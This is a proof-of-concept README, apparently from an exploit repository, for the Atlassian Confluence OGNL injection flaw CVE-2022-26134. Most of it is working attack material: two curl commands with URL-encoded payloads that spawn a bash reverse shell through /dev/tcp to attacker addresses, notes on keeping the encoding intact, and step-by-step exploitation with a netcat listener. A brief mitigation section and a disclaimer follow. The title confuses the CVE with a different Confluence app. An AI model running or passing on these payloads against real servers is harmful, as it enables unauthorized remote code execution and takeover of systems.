Active Exploitation of Atlassian’s Questions for Confluence App CVE-2022-26134# Active Exploitation of Confluence CVE-2022-26134
## Overview
CVE-2022-26134 is a critical **Remote Code Execution (RCE)** vulnerability affecting **Atlassian Confluence**. This vulnerability allows unauthenticated attackers to execute arbitrary code by injecting OGNL expressions into vulnerable endpoints.
## Affected Versions
- All supported versions of **Atlassian Confluence Server** and **Data Center** before the patched release.
## Exploit Details
The following **CURL** command demonstrates the active exploitation of this vulnerability, utilizing Java’s **Nashorn** engine to execute a reverse shell:
```bash
curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/
```
While making these modifications, we also need to take the URL encoding into account.
The payload string in the proof-of-concept isn't completely URL encoded. Certain characters (notably ".", "-" and "/") are not encoded.
Although it's not always the case, for this exploit, this turns out to be important to the functioning of the payload. If any of these characters are encoded,
the server will parse the URL differently, and the payload may not execute. This means we can't apply URL encoding across the whole payload once we've modified it.
curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.118.4/4444%200%3E%261%27%29.start%28%29%22%29%7D/
### Breakdown of the Payload
1. **`${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval(...)}`**
- Uses **Java Nashorn** script engine to evaluate an OGNL expression.
2. **`new java.lang.ProcessBuilder().command('bash','-c','bash -i > /dev/tcp/10.0.0.28/1270 0>&1').start()`**
- Spawns a reverse shell connecting back to **10.0.0.28:1270**.
## Exploitation Steps
1. Set up a **listener** on your attacking machine:
```bash
nc -lvnp 1270
```
2. Execute the **CURL** exploit command.
3. Upon successful exploitation, you will receive a reverse shell.
## Mitigation
- Atlassian has released **security patches** for affected versions. It is highly recommended to update to the latest version immediately.
- Restrict access to **Confluence servers** from untrusted sources.
- Monitor logs for suspicious requests containing OGNL expressions.
## References
- [Atlassian Security Advisory](https://confluence.atlassian.com/security)
- [CVE-2022-26134 Details](https://nvd.nist.gov/vuln/detail/CVE-2022-26134)
## Disclaimer
This documentation is for **educational purposes only**. Unauthorized exploitation of systems is illegal and may result in severe consequences. Always obtain proper authorization before conducting security assessments.
[4.0K] /data/pocs/f3e557607c7d82a2ca304aab01d448308ad88b31
└── [3.0K] README.md
0 directories, 1 file